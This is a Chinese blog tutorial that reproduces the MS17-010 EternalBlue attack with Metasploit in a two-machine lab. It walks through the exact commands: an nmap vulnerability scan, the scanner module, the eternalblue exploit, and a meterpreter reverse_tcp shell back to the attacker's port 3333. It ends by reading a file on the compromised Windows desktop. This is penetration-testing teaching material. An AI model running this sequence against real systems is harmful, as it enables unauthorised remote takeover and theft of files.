kali初讲——Metasploit攻击ms17_010复现
Metasploit攻击——ms17_010漏洞利用
文章目录
- Metasploit攻击——ms17_010漏洞利用
- 导论
- 一、ms17_010简介
- 二、攻击使用模块
- 三、、攻击思路
- 四、具体实施
- 总结
导论
学习此教程需遵守《中华人民共和国信息安全法》
所有教程仅用于信息安全测试,且在授权的情况下进行,请勿用于其他用途!
一、ms17_010简介
ms17_010漏洞其实就是永恒之蓝,属于一个较早期的windows的一个bug,攻击端口为445端口。
2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
英文为:Eternal Blue,翻译过来就是:永恒之蓝。
其实我们现在使用的电脑,几乎没有这个这个bug了。而且,不久之后,微软公司就针对这个bug发布了漏洞补丁。所以,该漏洞在当前很多系统上已经不存在了。
二、攻击使用模块
本次攻击利用的攻击工具为:Metasploit也就是MSF
主要用到Auxiliary(辅助模块),exploit(攻击模块),payload(攻击载荷),使用辅助模块为MSF中的:
auxiliary/scanner/smb/smb_ms17_010
exploit使用的主要是:
exploit/windows/smb/ms17_010_eternalblue
攻击载荷payload使用:
payload/windows/x64/meterpreter_reverse_tcp
内网测试搭建环境:
攻击机ip:192.168.3.125
靶机ip:192.168.3.127
反弹端口:3333
三、、攻击思路
1、nmap扫描靶机是否存在漏洞,得到漏洞名称
2、通过MSF中的辅助模块,验证漏洞是否存在
3、使用exploit相对应的模块进行攻击
4、设置攻击载荷
5、反弹shell
6、查看权限
7、查看靶机上的文件
四、具体实施
nmap扫描靶机漏洞及开放端口
命令为:nmap --script=vuln -Pn 192.168.3.127
192.168.3.127,为你自己靶机的ip
新开终端,并进入root账户。
我们在使用Linux的时候,你可以开多个终端。
打开msf
root权限:sudo -i
打开msf:msfconsole
查询ms17_010辅助模块
命令:search ms17_010
打开所需要的辅助模块(auxiliary)
命令:use auxiliary/scanner/smb/smb_ms17_010
查询该辅助模块需要设置的一些参数
命令:options
我们可以看到,需要设置的参数有:
靶机IP:RHOSTS
攻击端口:RPORT
这里rport(攻击端口)已经设置完成,我们便不在设置
设置所要攻击的主机ip命令:set rhosts 192.168.3.127
设置攻击端口:set rport 445
设置完成,然后扫描目标ip是否存在该漏洞
从图中我们可以看出,目标ip存在漏洞ms17_010,并且,得到了目标的系统版本:windows7 professional。
确定目标上包含此漏洞,那我们下一步肯定是利用该漏洞啦!
没错,就是exploit(攻击模块)
查询攻击模块:
命令:search ms17_010
我们这里使用的是eternalblue(永恒之蓝)
模块:exploit/windows/smb/ms17_010_eternalblue
打开该攻击模块
命令:use exploit/windows/smb/ms17_010_eternalblue
查看该模块需要设置的参数,就是:options/info
命令:options
其实这里也是有两个需要设置的参数,和上面一样的
靶机ip:rhosts
端口:rport
分别是:
set rhosts 192.168.3.127
set rport 445
设置完成,我们还需要设置攻击载荷(payload)
先去查询使用的攻击载荷,这里使用的是反弹shell
模块: windows/x64/meterpreter/reverse_tcp
然后设置payload:
命令:set payload windows/x64/meterpreter/reverse_tcp
然后查看需要设置的参数,命令和上面的一样:options
查询后开始设置,不过这里需要注意的是,我们这里设置的不是靶机的ip和端口,而是攻击机的ip和端口,这里需要注意。我们在使用msf中,需要注意是rhosts还是lhost,或者rports还是lport,这两个是有区别的,前者为被攻击,后者为攻击。
设置反弹ip:set lhost 192.168.3.125
设置反弹端口:set lport 3333
至此,利用ms17_010漏洞的所有都设置完毕,然后我们当然是进行最后一步,运行所有设置,攻击靶机
命令:run/exploit
不出意外的话,一稍等个几分钟,应该会返回如下界面
出现这个界面,说明我们的攻击已经成功了。
然后我们查询系统信息
命令:sysinfo
一般我们攻击肯定是有目的的攻击
我在我的靶机桌面创建了一个名为test的txt文件,我们下面就去,访问他,其中的内容。
使用windows下的shell
我们直接输入:
命令:shell
然后便切换到了windows的命令行也就是我们平时使用的cmd
然后我们列出当前文件夹位置,存在的所有文件
命令:dir
我们都知道,在windows中,桌面其实存在Users下的用户文件夹下面
我这里的用户名为:admin
所以我们使用命令直接切换到admin下
命令:cd Users/admin
在往下切一级文件目录,我们是不是就进入了桌面文件
命令:cd Desktop
查看文件内容
命令:more test.txt
至此,对ms17_010漏洞的复现就讲解完了
总结
其实我们去对目标进行渗透的时候,无非分成下面这几步
1、对目标进行信息收集
2、扫描目标可能存在的的漏洞
3、对漏洞进行测试
4、使用攻击脚本
5、得到想要的结果
当然,实际问题实际分析,要把自己的思维活跃起来!
文中如有错误,请联系笔者修改!
如有侵权,请联系笔者删除!
kali初讲——Metasploit攻击ms17_010复现相关推荐
- kali初讲——Metasploit工具MSF初学
Metasploit--MSF 文章目录 Metasploit--MSF 导论 一.Metasploit简介 二.Metasploit模块介绍 三.MSF基础指令 四.MSF常用模块粗讲 五.msf搜 ...
- Kali渗透测试:使用工具Metasploit攻击操作系统
Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击.Metasploit是目前非常优秀的一款漏洞渗透工具. 1. ...
- Shadow broker=fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP
0x01 前言 4月14日,影子经纪人在steemit.com上公开了一大批NSA(美国国家安全局)"方程式组织" (Equation Group)使用的极具破坏力的黑客工具,其中 ...
- Metasploit攻击win7实例(上)
一.实验目的 通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试.攻击. 二.实验环境 图1 实验拓扑图 ...
- Metasploit攻击linux实例
一.实验目的 通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法 二.实验环境 漏洞主机:linux, IP 地址:10.1.1.136 攻击主机:Kali ...
- 目标URL存在http_host头攻击漏洞复现及修复
目标URL存在http_host头攻击漏洞复现及修复 文章目录 目标URL存在http_host头攻击漏洞复现及修复 漏洞说明 漏洞描述 危险等级 修复建议 漏洞复现 curl测试方法 BurpSui ...
- 使用kali nethunter执行badUSB攻击--基于Rucky工具
使用kali nethunter执行badUSB攻击–基于Rucky工具 1.下载工具 从F-Droid商店下载Rucky工具 2.攻击语言语法介绍 参考up主无序熵增进行整理:https://www ...
- Kali渗透测试——利用metasploit攻击靶机WinXP SP1
搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配 ...
- MetaSploit攻击实例讲解------Metasploit自动化攻击(包括kali linux 2016.2(rolling) 和 BT5)...
不多说,直接上干货! 前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 2016.2(Ro ...
最新文章
- 【加强版】js原生实现拖拽效果,这次没有用document的mousedown、mousemove、mouseup事件我们来点实际的(但是有个弊端:拖拽过程中鼠标会变成一个禁用符号,不太友好)
- 目标跟踪之camshift---opencv中meanshift和camshift例子的应用
- 傅里叶变换时间复杂度
- NIPS 2016 | Best Paper, Dual Learning, Review Network, VQA 等论文选介
- 腐烂国度2怎么学计算机,腐烂国度2按键操作说明 腐烂国度2怎么操作
- gpio_direction_output 与 gpio_set_value
- openal 基础知识4
- jmeter下TPS插件的安装
- Vue 项目 Element-ui CDN引入后体积不变或变大的问题
- Java—以当前系统时间生成随机数
- 树莓派 40pin IO引脚测试
- 棋牌漏洞游戏反汇编译破解修改透视案例分析
- 什么是Kurento
- 登录起凡是显示计算机拒绝无法连接,怎么解决win10系统无法连接打印机并显示未指定设备问题?...
- matlab—赋值具有的非单一 rhs 维度多于非单一下标数
- 不求星光灿烂,但愿岁月静好
- iOS 内购提示不允许App内购买项目,打开内购方式和检测不允许内购的方法。
- 黑盒测试技术(Decision Tables 决策表法,又称判定表法)——软件质量保证与测试
- 【分布式微服务】消息中心初步搭建
- 6.22 Java练习(根据输入的值计算BMI的值,根据标准判断BMI的值并给出相应健康提示。)
热门文章
- 杭州临安区太阳镇农业之旅
- 2022年软件测试面试题大全【含答案】
- html符号/字符大全(依据官网,有点多,卡)
- heapster+influxdb+grafana
- 【餐厅点餐平台|二】总体设计
- (转)平方根的快速算法(sqrt)
- segmentation fault怎么解决_丽江400电话怎么办理
- 两根网线可以直接连接吗?
- 教你在Linux上写“剧本”,“剧情”.我们只是一个快乐的小编剧,只需要写好剧本,剩下的表演就看我们的linux机群了.
- 洗地机到底好不好用,洗地机好还是扫地机器人好